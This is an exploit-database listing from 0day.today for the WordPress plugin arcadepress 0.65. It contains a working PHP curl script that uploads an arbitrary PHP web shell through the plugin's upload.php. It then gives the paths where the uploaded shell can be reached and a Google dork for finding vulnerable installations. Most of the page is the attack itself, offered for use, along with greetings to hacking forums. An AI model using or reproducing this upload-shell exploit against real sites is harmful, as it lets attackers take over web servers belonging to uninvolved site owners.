[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Plugin arcadepress upload shell

Author
DoSs-Dz
Risk
[
Security Risk High
]
0day-ID
0day-ID-18668
Category
web applications
Date add
17-06-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0  ..::> Site            : 1337day.com                                   0
1  ..::> Support e-mail  : submit[@]1337day.com                          1
0                                                                        0
1               +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+                1
0               |I'm DoSs-Dz Member From Inj3ct0r Team  |                1
1               +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1  
+---------------------------------------------------------------------------------------------------+
|-> Author: DoSs-Dz                                                                                 |                                                   
|-> Exploit Title : Wordpress Plugin arcadepress upload shell                                       |
|-> Vendor Site  :  http://downloads.wordpress.org/plugin/arcadepress.0.65.zip                      |
|-> version : 0.65                                                                                  |
|-> faceebook : fb.me/M3TaSplo1T                                                                    |
|-> Google Dork : inurl:/plugins/arcadepress/                                                       |
|-> Big 10x T0 : Naila ( Nina )                                                                     |
+---------------------------------------------------------------------------------------------------+
=> Exploit on : 
 [+] Expl/PoC: 
   
<?php
$MyShell="C:\AppServ\www\dz0.php";
$Dz = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/arcadepress/php/upload.php");
curl_setopt($Dz, CURLOPT_POST, true);
curl_setopt($Dz, CURLOPT_POSTFIELDS,
array('File'=>"@$MyShell"));
curl_setopt($Dz, CURLOPT_RETURNTRANSFER, 1);
$dz = curl_exec($Dz);
curl_close($Dz);
echo $dz;
?>


Shell Directory : 
   http://127.0.0.1/wordpress/wp-content/uploads/arcadepress/dz0.php
   http://127.0.0.1/wordpress/wp-content/uploads/file/dz0.php
=> Live Demos : n/a
   
  
+---------------------------------------------------------------------------------------------------+
|-> Spec!4l 10x 2 : Black-ID - Tn_Sploiter - Robert Miles - BaC-Dz - Damane2011 <3                  |
|-> Great'z : Sec4ever - is-sec.org - v4-team - vbspiders - all arab hack or security forum :)      |
|-> exploit-db.com - exploit4arab.com - 1337day.com                                                 |
+---------------------------------------------------------------------------------------------------+
./ Copyright r 2012 Khaled Hamaimi - Dz 
./ Ilove u zaza 



#  0day.today [2024-09-19]  #